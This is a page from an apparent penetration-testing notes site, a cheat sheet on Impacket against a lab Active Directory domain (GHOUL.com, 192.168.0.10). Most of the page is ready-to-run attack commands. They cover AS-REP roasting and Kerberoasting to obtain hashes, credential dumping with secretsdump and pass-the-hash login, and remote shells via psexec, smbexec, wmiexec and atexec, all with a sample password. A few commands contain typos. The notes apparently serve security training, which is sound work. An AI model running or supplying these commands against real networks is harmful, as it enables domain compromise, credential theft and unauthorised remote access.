🛠️
Ghoul's Den
WebsiteGhoulsec-Vault
  • Ghoul's Den
  • Index of Tools
  • Index of Links
  • Top Ports
  • Initial Environment Deployment
    • Python3 & Pip Installation
    • Docker 🛳
    • Setting up AWS CLI
    • Msfconsole
    • Netplan configuration & Cloudinit
    • Wordlist Generation - CEWL
    • Apache2 Server
  • Information Gathering & Recon Tools
    • GHDB : Google Hacking Database
    • Sherlock : Social Media Footprinting
    • Nslookup
    • Dig (Domain Information Groper)
    • Recon-ng
    • HTTrack & Web Data Extractor
    • Email Tracker Pro
    • Shodan
    • ARIN Website Registry
  • Network Scanning Enumaration & Vulnerability Detection Tools
    • NMAP & SuperENUM
    • Nmap
      • Target Specification
      • Host Discovery
      • Port Scanning Techniques
      • Port Specification & Scan Order
      • Service Version Detection
      • OS Detection
      • Nmap Scripting Engine
      • Timing & Performance
      • FW / IDS / IPS Evasion
      • Miscellaneous Options
    • Colasoft Packet Builder & Megaping
    • Global Network Inventory
    • LDAP Enumeration > Active Directory Explorer
    • NetBIOS Enumerator
    • SMBEagle
    • RPC Scan
    • Nikto - Web Application Scanner
    • Enum4Linux
  • File Sharing Enumeration
  • Cloud Computing
    • AAD Internals
    • AWS CLI & S3
    • Trivy Scanner
    • S3 Scanner
    • LazyS3
  • Cryptography & stegnography
    • Veracrypt
    • Cryptanalysis Tools
    • Whitespace Cryptography - Snow
    • Creating a Self signed certificate in IIS
    • Steghide & Stegcracker
    • snow
  • Wireless Attacks
    • Aircrack-ng
  • Mobile Attacks
    • PhoneSploit-Pro
    • AndroRAT
    • ADB
  • SQL Injection Vulnerability
    • SQLMap
    • DSSS
  • IOT & OT Hacking
  • Social Engineering
  • Honeypot & IDS
    • Cowrie Honeypot
  • Sniffing & DDos
    • Sniffing
      • Capturing Remote packets using Wireshark
      • Detecting Sniffing using Nmap
    • Denial of Service (Dos & DDos)
      • DDos Protection using DDos Guardian
  • Malware Attacks
  • Password Cracking & Windows exploitation tools
    • Hydra
    • John
    • Hashcat
    • CrackMapExec
    • Impacket
    • Powerview
    • BitsAdmin
    • Rubeus (Kerberoasting) & Winpeas
    • AD-DC Querying
    • mstsc - RDP
  • System hacking & buffer overflow
    • Responder
    • Reverse Shell Generator
    • Clearing Traces
  • Session Hijacking
    • Caido
    • Bettercap
  • Web Servers & Applications
  • Linux Fundamentals
    • Find Command
    • Grep Command
Powered by GitBook
On this page
  1. Password Cracking & Windows exploitation tools

Impacket

Impacket is a collection of Python libraries and tools designed for working with network protocols, commonly used in penetration testing, red teaming, and post-exploitation. It supports a wide range of protocols such as SMB, TCP, UDP, HTTP, LDAP, and more, allowing users to craft, manipulate, and interact with network packets. Impacket includes tools for tasks like remote command execution, credential dumping, and SMB/NTLM operations, making it particularly useful for interacting with Windows networks. Its scriptable and extensible nature, along with its support for low-level protocol manipulation, makes Impacket a powerful tool for security professionals.

ASREP Roasting : Unprivileged accounts on the windows domain

impacket GetNPUsers.py GHOUL.com/ -dc-ip 192.168.0.10 -no-pass -usersfile /users.txt

Getting User account hashes with compromised SPN user on the AD

impacket GETUSERSPNs.py GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10

This will list the other SPN users on the windows AD and to get their hashes we will dump with the following command :

impacket GETUSERSPNs.py GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10 -request

Impacket psexec

Once we crack the hashes of the priviledged accounts on the AD we will now try to gain the shell of the target machine using :

impacket-psexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10

to dump secrets of other users

impacket-secretsdump GHOUL.com/ghoul@"Hang@123"@192.16.0.10

after getting the full hash of the active accounts on the AD then we can log into any user accounts via providing hash directly

impacket-psexec GHOUL.com/ghoul@192.168.0.10 -hashes <hash:hash>

It is very important to check wheather the same account also exists on the local workgroup which can be known through :

impacket-psexec ghoul:"Hang@123"@192.168.0.10

Impacket-smbexec & Impacket-wmiexec

impacket-smbexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10
impacket-wmiexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10

Impacket-atexec : Directly pass commands on the targeted server

impacket-atexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10 whomai

Lookup sid to list potenial users on the targeted domain

impacket-lookupsid GHOUL.com/ghoul:"Hang@123"@192.168.0.10

Services execution on the targeted domain

impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 --help
impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 list
impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 start <service name>

SMBclient over Impacket

impacket-smbclient GHOUL.com/ghoul:"Hang@123"@192.168.0.10

for cracking hashes we can crack the hases using hashcat , The detailed overview of hashcat is given below :

PreviousCrackMapExecNextPowerview

Last updated 4 months ago

Hashcat